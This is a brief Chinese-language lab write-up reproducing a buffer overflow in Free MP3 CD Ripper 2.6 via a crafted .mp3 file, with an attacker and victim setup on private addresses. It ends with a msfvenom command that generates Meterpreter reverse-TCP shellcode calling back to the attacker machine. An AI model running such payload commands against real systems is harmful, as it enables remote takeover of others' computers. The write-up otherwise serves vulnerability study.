简介
Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在缓冲区溢出漏洞。远程攻击者可以借助特制的以.mp3为后缀的文件,利用该漏洞执行任意代码。
环境搭建
1.攻击机:kali ip:192.168.111.129
2.靶机:windows10 安装Free MP3 CD Ripper 2.6版本 ip:192.168.3.20
Free CD Ripper 2.6下载地址:https://free-mp3-cd-ripper.soft32.com
漏洞复现
利用msf生成反向连接的shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.129 lport=888 -f c --smallest